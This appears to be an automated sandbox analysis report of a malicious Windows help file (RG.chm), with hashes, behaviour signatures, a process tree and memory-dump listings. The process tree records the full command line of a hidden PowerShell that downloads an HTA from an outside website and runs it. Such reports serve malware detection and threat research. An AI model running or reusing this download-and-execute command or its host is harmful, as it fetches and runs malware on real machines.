Analysis
- max time kernel: 30s
- max time network: 33s
- platform: windows7_x64
- resource: win7-20230220-en
- resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
- submitted: 21-03-2023 10:42

Static task: static1
Behavioral task: behavioral1
- Sample: RG.chm
- Resource: win7-20230220-en (windows7-x64)
- 5 signatures
- 150 seconds
General
- Target: RG.chm
- Size: 190KB
- MD5: 9d9a0a119044c6a83d533a1941bb64c5
- SHA1: 279387ccf49c5f71c99f8b89b333be4a70f6cab6
- SHA256: 83a1b442bf9761f33881468eb8be300e18c5c12691eb52681efee2c4c5842a06
- SHA512: 31c4edbcff416df4cada81dbd1e3bdc752cb8a74c837787feba01d9e93e00970b15efac6bf70548b8ba1811cf7e7522bbd64cfe0572d5619759b8069b5b399b2
- SSDEEP: 3072:Xg4C8YLEo5xuIvDocDWjc/pgDXQgKpacezvRBDobwrArHMp1G6/AirUIKX6MA:XpYIW0UY8pTxp/mjmqArYRQIKX5A
- Score: 1/10
Malware Config
Signatures

Modifies Internet Explorer settings
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Internet Explorer\Main | hh.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
pid | process
520 | powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 520 | powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
1700 | hh.exe
1700 | hh.exe

Suspicious use of WriteProcessMemory 3 IoCs
Processes:
description | pid | process | target process
PID 1700 wrote to memory of 520 | 1700 | hh.exe | powershell.exe
PID 1700 wrote to memory of 520 | 1700 | hh.exe | powershell.exe
PID 1700 wrote to memory of 520 | 1700 | hh.exe | powershell.exe
Processes
- C:\Windows\hh.exe
  Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\RG.chm
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of hh.exe)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden wget 'https://meubooking.com.br/2023/reservations.php?file=edce4301c8d01cf9b904be.html' -OutFile 'C:\Users\Public\win32.hta'; Start-Process 'C:\Users\Public\win32.hta'
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/520-80-0x000000001B4A0000-0x000000001B782000-memory.dmp (Filesize 2.9MB)
- memory/520-81-0x0000000001D70000-0x0000000001D78000-memory.dmp (Filesize 32KB)
- memory/520-82-0x00000000029B0000-0x0000000002A30000-memory.dmp (Filesize 512KB)
- memory/520-83-0x00000000029B0000-0x0000000002A30000-memory.dmp (Filesize 512KB)
- memory/520-84-0x00000000029B0000-0x0000000002A30000-memory.dmp (Filesize 512KB)
- memory/520-85-0x00000000029BB000-0x00000000029F2000-memory.dmp (Filesize 220KB)
- memory/1700-73-0x000007FFFFF80000-0x000007FFFFF90000-memory.dmp (Filesize 64KB)